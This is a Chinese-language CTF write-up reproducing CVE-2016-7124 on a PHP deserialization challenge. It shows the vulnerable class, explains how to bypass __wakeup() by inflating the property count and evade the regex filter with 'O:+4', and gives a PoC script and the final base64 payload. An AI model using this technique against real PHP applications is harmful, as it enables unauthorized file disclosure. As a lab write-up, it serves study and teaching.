CVE-2016-7124漏洞复现—php反序列化漏洞

参考攻防世界web方向Web_php_unserialize题目

主要原因:如果存在__wakeup()函数,掉用**unserialize()**方法前会先调用wakeup方法,但如果序列化中表示属性个数的个数大于真实属性个数会跳过wakeup的执行,从而可以恶意构造字符串,反序列化成想要执行的函数

打开题目网页php代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

思路

1、需要绕过wake up函数

虽然function __wakeup函数想要把你强制成index.php,但是我们依然有绕过方法

1
2
3
4
5
6
function __wakeup() { 
    if ($this->file != 'index.php') { 
        //the secret is in the fl4g.php
        $this->file = 'index.php'; 
    } 
}

**__wakeup()**:是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查是否存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。

绕过方法:__wakeup()函数漏洞就是与对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数,如果该数字大于真实属性个数,就会绕过__wakeup()函数。

知道它的机制后我们到时候改下序列化后的字符串中的那个属性个数就ok了,此类中只有$file这一个属性和三个function而已,个数应该为1

2、绕过正则表达式

(preg_match(’/[oc]:\d+:/i’, $var))
而正则匹配的规则是: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 “c:数字’ 这样的格式 , 那么就被过滤 .很明显 , 因为 serialize() 的参数为 object ,因此参数类型肯定为对象 “ O “ , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 “ O:4 “ 这样的字符串肯定无法通过正则匹配
绕过方法:而O:+4没被过滤说明绕过了过滤而且最后的值不变。

3、必须是base64加密

把上述绕过处理的字符串base64加密就行了

poc

先把反序列化后的代码想清楚,其实就是$a = new Demo(“f14g.php”),那么它序列化后长这样:

O:4:”Demo”:1:{s:10:”Demofile”;s:8:”fl4g.php”;}

由上面分析可知有三个地方阻挡了咋们,按照上述分析,我们把”Demo”后面的1换成2,1是因为属性就$file一个,改变个数就可以绕过__wakeup()函数啦,这样咋们想访问的fl4g.php就能生效了

再把O:4换成O:+4这样绕过正则表达式

最后把我们处理的字符串进行base64加密

测试poc.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 		
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

$a = new Demo("fl4g.php");		//因为说了是f14g.php文件
$payload = serialize($a);		
$payload = str_replace(':1:', ':2:', $payload);	//绕过__wakeup()
$payload = str_replace('O:4', 'O:+4', $payload);	//绕过正则表达式
var_dump($payload);
var_dump(base64_encode($payload));
?>

结果:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==就是咋们要传入的参数啦

image-20210609174411533

反序列化执行获取flag=”ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}”

image-20210609174504066